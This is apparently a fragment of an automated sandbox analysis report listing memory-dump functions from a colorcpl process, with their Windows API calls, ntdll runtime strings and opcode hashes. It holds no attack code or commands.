                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 9e973f17b5b8544fb84cdbe4ff15d1b73ef879336a3caa57d01ebe20dc848361
                                                                                                                                                                          • Instruction ID: 1d79eb109817f255e86d27260af7645f1f6e95f057026e6bd37631139191434f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e973f17b5b8544fb84cdbe4ff15d1b73ef879336a3caa57d01ebe20dc848361
                                                                                                                                                                          • Instruction Fuzzy Hash: 89B09B719025C5D9FB11F760460871B7A006BD1705F15C561D3034741E4738D5D5F176
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000E19A2
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 000E19B1
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000E19BA
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 000E19C3
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 000E19D8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4550455934.00000000000E3000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_e0000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1445889803-0
                                                                                                                                                                          • Opcode ID: 9fc180cf3996136df10678de66e18d3cfa3aff8fbc361f9349ebb4f27ed6c3d2
                                                                                                                                                                          • Instruction ID: a5f4626eef8878d190c87bf931305a8cc2fb6c0e004e0867c89804a8900eb455
                                                                                                                                                                          • Opcode Fuzzy Hash: 9fc180cf3996136df10678de66e18d3cfa3aff8fbc361f9349ebb4f27ed6c3d2
                                                                                                                                                                          • Instruction Fuzzy Hash: 39111C71D01248EFEB14DBB9D998AAEBBF4FF48711F514865D401FB250E6349B00DB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,000E1BF9,000E1000), ref: 000E1ACA
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(000E1BF9,?,000E1BF9,000E1000), ref: 000E1AD3
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,000E1BF9,000E1000), ref: 000E1ADE
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,000E1BF9,000E1000), ref: 000E1AE5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4550455934.00000000000E3000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_e0000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                          • Opcode ID: 11916f62ea46e7c82e7ea66ddda1e0a197879e43354c94220e803a6460b0b701
                                                                                                                                                                          • Instruction ID: e779c4ce2738e40f1ea400993c49cad113035d273e32bedc017f25ee28e29980
                                                                                                                                                                          • Opcode Fuzzy Hash: 11916f62ea46e7c82e7ea66ddda1e0a197879e43354c94220e803a6460b0b701
                                                                                                                                                                          • Instruction Fuzzy Hash: 6ED01232000184FBE7002BE1ED5CB497F28FB48B62F040400F30EAB031CB799A018F55
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                          • Opcode ID: e07e4c2b749371496318946d174707ab3a6745bce83595e0299eb3afab5b8200
                                                                                                                                                                          • Instruction ID: fb972bdfdc108578b4a71ec5c68336456325dc16938cb55a9319ed583020fb06
                                                                                                                                                                          • Opcode Fuzzy Hash: e07e4c2b749371496318946d174707ab3a6745bce83595e0299eb3afab5b8200
                                                                                                                                                                          • Instruction Fuzzy Hash: F551E9B1A042167FDB11EF98D89097EF7B8BB09204B108B79E495D7645E274FE4097E0
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                          • Opcode ID: 83443d2dadc09f77c7d578bcd6f85589e2bc379f20c0657e2904eb0d83311965
                                                                                                                                                                          • Instruction ID: 6b7d96f4093bbfd8d35af2b7894996229b048911a850e59d2ca34b4f9b8ae2ce
                                                                                                                                                                          • Opcode Fuzzy Hash: 83443d2dadc09f77c7d578bcd6f85589e2bc379f20c0657e2904eb0d83311965
                                                                                                                                                                          • Instruction Fuzzy Hash: C451F271A00645AADB30DF9CC890D7EB7BDFF84285B0089B9F496D7641E6B4FA008B60
                                                                                                                                                                          Strings
                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04904725
                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04904655
                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049046FC
                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04904787
                                                                                                                                                                          • Execute=1, xrefs: 04904713
                                                                                                                                                                          • ExecuteOptions, xrefs: 049046A0
                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04904742
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                          • Opcode ID: a94824ff8d262c20f2ac670814abc55f3b03505a1b7e6e5ec1340df745e62ebf
                                                                                                                                                                          • Instruction ID: 5df09c21ce34fe64267d30dd36972efbfe8859ae973d0d7d63164c90b513225f
                                                                                                                                                                          • Opcode Fuzzy Hash: a94824ff8d262c20f2ac670814abc55f3b03505a1b7e6e5ec1340df745e62ebf
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B51D63164021E6BEB10AAA8DC99FA977A8EB44704F140AADE605E7290E770FE45CF51
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550455934.00000000000E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4550455934.00000000000E3000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_e0000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2849151604-0
                                                                                                                                                                          • Opcode ID: f47bacc0434aaa43ba0b31f576aadafc21f32dddeca83fc8f8fde7f1d452c4db
                                                                                                                                                                          • Instruction ID: 9319858bd3216cf2c60597baa814357495d14551afc67d2ea1d8607ac91b1f74
                                                                                                                                                                          • Opcode Fuzzy Hash: f47bacc0434aaa43ba0b31f576aadafc21f32dddeca83fc8f8fde7f1d452c4db
                                                                                                                                                                          • Instruction Fuzzy Hash: 3741D476A007D5DFEB749B66D8847FD76E4BB88B21F100129E902BB2D0DB788E40CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                          • String ID: +$-$0$0
                                                                                                                                                                          • API String ID: 1302938615-699404926
                                                                                                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                          • Instruction ID: 7b0da6fd480e469cf4cfdd3283a184b478b00f1fd632720535638e57742fec34
                                                                                                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                          • Instruction Fuzzy Hash: 5C81A070E072499FDF248E68C8917FEBBB1AF45364F1A4B69E861E7290D734B840CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                                                                                          • API String ID: 48624451-2819853543
                                                                                                                                                                          • Opcode ID: b91f5c3eed809bc7e065c79542d9b827109aec091e9888112242f2984489b3fa
                                                                                                                                                                          • Instruction ID: ebb340d90f1cb7e183d07cff67062b15b8dc30cfa0fc62984c05d9f8833d07c2
                                                                                                                                                                          • Opcode Fuzzy Hash: b91f5c3eed809bc7e065c79542d9b827109aec091e9888112242f2984489b3fa
                                                                                                                                                                          • Instruction Fuzzy Hash: E1213676A00119ABDB10EFA9D840DBEB7EDEF98684F440566F945D3200E771E901DBA1
                                                                                                                                                                          Strings
                                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049002BD
                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 0490031E
                                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049002E7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                                          • Opcode ID: 358dd6d2f60639160ef1357fc761e272ca8a426f25cc6377113dcd92f2a32f59
                                                                                                                                                                          • Instruction ID: f6517f05b4c9acf428acdbda0bab131c1ef100edd61d1733cb71b261fe43ea90
                                                                                                                                                                          • Opcode Fuzzy Hash: 358dd6d2f60639160ef1357fc761e272ca8a426f25cc6377113dcd92f2a32f59
                                                                                                                                                                          • Instruction Fuzzy Hash: EFE19F306047419FD725CF28C884B6AB7E4AB89718F144B69EAA5CB3D1E774E944CB82
                                                                                                                                                                          Strings
                                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04907B7F
                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 04907BAC
                                                                                                                                                                          • RTL: Resource at %p, xrefs: 04907B8E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                          • API String ID: 0-871070163
                                                                                                                                                                          • Opcode ID: 9712bfd011144d31f4391d6a4bccd3ddc8ce450ef99e9e9748d982275b26347e
                                                                                                                                                                          • Instruction ID: a344199d0708418d9e14a781634d533797d2517853a8c27bed0e68a35ec44069
                                                                                                                                                                          • Opcode Fuzzy Hash: 9712bfd011144d31f4391d6a4bccd3ddc8ce450ef99e9e9748d982275b26347e
                                                                                                                                                                          • Instruction Fuzzy Hash: ED41BE31711B069FD720DE29D841B6AB7E5EF88724F100E2DE95ADB780EB71F8058B91
                                                                                                                                                                          APIs
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0490728C
                                                                                                                                                                          Strings
                                                                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04907294
                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 049072C1
                                                                                                                                                                          • RTL: Resource at %p, xrefs: 049072A3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                                                                          • Opcode ID: 5e59904d08e52bec1fefb55740c72160e006044d75b312553d167eaaba2f328b
                                                                                                                                                                          • Instruction ID: ce2bc5ea0e46141211a672851f64183ee26b1d3b9e3baa7f1ba0b26e0ec7f3a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e59904d08e52bec1fefb55740c72160e006044d75b312553d167eaaba2f328b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6241F23170461AAFD720DE69CC41B66B7A5FF84728F104A29F955EB280DB31F852CBD1
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                                          • Opcode ID: 5d80d13d7f2b84c6321821c4d0a2d39d442b11c8541d3ed183ade5964f3e970a
                                                                                                                                                                          • Instruction ID: 451e37ffc5225885ebb97bb0815d661897b5537b9cf364ab430f180e20e93fd7
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d80d13d7f2b84c6321821c4d0a2d39d442b11c8541d3ed183ade5964f3e970a
                                                                                                                                                                          • Instruction Fuzzy Hash: A03145726006199FDB20DF29CC40FAE77B8FB44B54F4445A5F849E7240EB30BA449B61
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                          • String ID: +$-
                                                                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                          • Instruction ID: a5a4a8fda9f0b134e2237fae4b6fafb77c2fee5b9554a585bcb3edb531337783
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                          • Instruction Fuzzy Hash: E791B571E022199BDF38DE69C881ABEB7A1EF44724F544F1AEC65E72C0E770B9408761
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $$@
                                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                                          • Opcode ID: a3a786a2251fed97d1ffe7088c5ab908aa67a33ad9bdb730a3527e140e73a3ed
                                                                                                                                                                          • Instruction ID: 69d1286fbe19a790899e242c37317925cde484ab82b101cb94c31bac229ba41f
                                                                                                                                                                          • Opcode Fuzzy Hash: a3a786a2251fed97d1ffe7088c5ab908aa67a33ad9bdb730a3527e140e73a3ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 94813EB1D002699BDB35CB54CC44BEEB7B8AB08714F0446EAEA09F7640D775AE84CF61